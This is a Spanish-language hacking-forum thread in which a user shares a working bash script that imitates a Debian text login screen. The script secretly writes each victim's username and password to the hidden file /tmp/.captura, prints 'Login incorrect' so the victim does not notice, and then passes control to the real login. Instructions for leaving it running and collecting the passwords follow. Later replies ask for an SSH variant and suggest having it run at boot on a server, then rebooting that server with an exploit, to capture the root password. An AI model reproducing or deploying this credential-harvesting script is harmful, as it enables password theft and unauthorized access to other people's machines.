Tema destacado: Entra al canal IRC oficial de #elhacker.net
 Autor
|
Tema: Falso login (modo texto) (Leído 2,499 veces)
|
|
H@T
|
Aca les dejo un falso login que hice hace tiempo, espero que les guste y les sirva, esta bien documentado, pero cualquier cosa me preguntan. Lo logre hacer gracias a lo que aprendi en la universidad, aca lo tienen: H@T#cat falso_login.sh #Abro editor de texto vi con el nombre de archivo falso_login.sh
clear #Limpio pantalla
echo "Debian GNU/Linux 4.0 debian `tty | cut -c6,7,8,9`" #Pantalla de inicio de Debian 4.0 ustedes pongan la que tienen
echo
echo -n "`uname -n` login: " #Imprimo nombre de host, seguido de la palabra login
read usu #Guardo en la variable usu el nombre de usuario capturado de teclado
stty -echonl -echo #Evita que se lea todo lo que se tipea, obviamente para no leer el password que se escribe
echo -n "Password: "
read pass #Escbribo la palabra password para que aparezca en pantalla y que el usuario la teclee
echo
sleep 3
echo >> /tmp/.captura
echo "Usuario: $usu" >> /tmp/.captura #Envio el nombre de usuario capturado al archivo .pass ubicado en /tmp
echo "Contraseña: $pass" >> /tmp/.captura #Envio la password del usuario al mismo archivo que la linea anterior
echo >> /tmp/.captura
echo
echo "Login incorrect" #Muestro por pantalla login incorrecto para que el user no sospeche
echo
exec /bin/login #Ejecuto el verdadero login
Guardo el archivo con [ESC]: -> wq
Cambio permisos para que pueda ejecutarse:
#chmod a+x falso_login.sh
Dejamos ejecutando esperando que algun usuario ingrese su login y su pass y listo
H@T#./falso_login.sh
Luego una vez que el usuario dejo la pc, volvemos a dicha maquina y vemos lo siguiente:
H@T#cat /tmp/.captura
Veremos como resultado los usuarios y password que ingresaron
|
|
|
|
« Última modificación: 15 Abril 2007, 10:14 por H@T »
|
En línea
|
|
|
|
|
mangel12321
|
XD, que grande...
No tendras ninguno que simule el login de un servidor de ssh no?, hmmm, no deberia de ser demasiado complicado de programar, alguien se anima?
|
|
|
|
|
En línea
|
|
|
|
|
H@T
|
mmm mira me voy a poner en campaña, es mas utilizando esta mismo programa, no creo que sea dificil, lo pruebo y si lo hago te lo pongo.
A ver si entendi bien, vos queres un falso login del cliente del SSH, cierto?
|
|
|
|
« Última modificación: 16 Abril 2007, 00:14 por H@T »
|
En línea
|
|
|
|
|
mangel12321
|
exacto.  Como piensas hacerlo, C, java, perl (seria posible?), etc? |
|
|
|
|
En línea
|
|
|
|
|
H@T
|
El el que mas clara la tengo es en C, asi que voy a tratar de hacerlo en dicho lenguaje.
|
|
|
|
|
En línea
|
|
|
|
Leber
 Desconectado
Mensajes: 338
"Fracta, non verba"
|
Buenas
¿Este scripts sería para ejecutarse en local verdad? Una vez accedido a la máquina, ¿cierto?
|
|
|
|
|
En línea
|
"Solo los tontos carecen de preucupaciones." Johann Wolfgang Goethe
|
|
|
|
H@T
|
Buenas
¿Este scripts sería para ejecutarse en local verdad? Una vez accedido a la máquina, ¿cierto?
Exacto o a un servidor o pc que tengas acceso fìsico.
|
|
|
|
|
En línea
|
|
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas !!
Aquí hay tela que cortar....vamos haber sirve para acceso ssh al servidor?
Los suyo sería, una vez tenido este bash, guardarlo en.....algún sitio (no caigo ahora) donde al iniciar la sesión del root localmente en la máquina le salga a él.
Se entendió?
Bueno el paso sería ese, colocar este bash en algún lugar que se ejecutara al iniciar el SO.
Luego una vez puesto en el lugar, (puede ser en /etc/modules?), reiniciamos el servidor mediante algún exploit (recordamos que ahora estamos en ssh).
Una vez reiniciado el servidor, el root localmente metera la clave tal y cual y bueno una vez que s elevante el servicio ssh, nosotros entramos y nos dirigimos a /tmp.captura a buscar nuestra contraseña.
Se entendió??
Saludos !!
|
|
|
|
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe   |
|
|
|
H@T
|
Wenas !!
Aquí hay tela que cortar....vamos haber sirve para acceso ssh al servidor?
Los suyo sería, una vez tenido este bash, guardarlo en.....algún sitio (no caigo ahora) donde al iniciar la sesión del root localmente en la máquina le salga a él.
Se entendió?
Bueno el paso sería ese, colocar este bash en algún lugar que se ejecutara al iniciar el SO.
Luego una vez puesto en el lugar, (puede ser en /etc/modules?), reiniciamos el servidor mediante algún exploit (recordamos que ahora estamos en ssh).
Una vez reiniciado el servidor, el root localmente metera la clave tal y cual y bueno una vez que s elevante el servicio ssh, nosotros entramos y nos dirigimos a /tmp.captura a buscar nuestra contraseña.
Se entendió??
Saludos !!
Man disculpa pero no entendi muy bien lo que pusiste, si no te ofende podrias explicarlo con otras palabras?
|
|
|
|
|
En línea
|
|
|
|
.NiXoN.
Desconectado
Mensajes: 942
Ubuntu user :D
|
Wenas !!
Sí, mira te explico.
En los SO Window$ esta la entrada Run del Regedit que sirve, que al iniciar el sistema, se cargue ciertos archivos / documentos.
Entonces, en Linux, hay un archivo (me parece que es /etc/modules) en el cual, todo lo que hay ahí se carga al iniciar el SO Linux.
Entonces, véamos si nuestro falso_login.sh lo guardamos por ejemplo en........
/home/grupo/usuario/Desktop/prueba/falso_login.sh
Al iniciar sesión en el SO Linux, se autoejecutará dicho script. Hasta aquí se entiende?
Es poner el faslso_login.sh en un sitio que, al reiniciar el SO se cargue.
Por que H@T donde guarda usted el archivo para que se autoejecute al iniciar el SO???
Eso por un lado ahora por todo, si mediante una session shh con algún servidor Linux (con privilegios bajos claro está), hacemos que el falso_login.sh, se autoejecute al iniciar el SO Linux (lo he explicado en el apartado anterior).
Entonces, nosotros desde nuestra sesión ssh podríamos ir a buscar nuestro /tmp/.captura ¿?
Se ha entendido??????
Saludos !!
P.D: no pasa nada, si no se entiendo lo explico otra vez
|
|
|
|
|
En línea
|
El que todo lo sabe sabe que no todo lo sabe |
|
|
|
 |
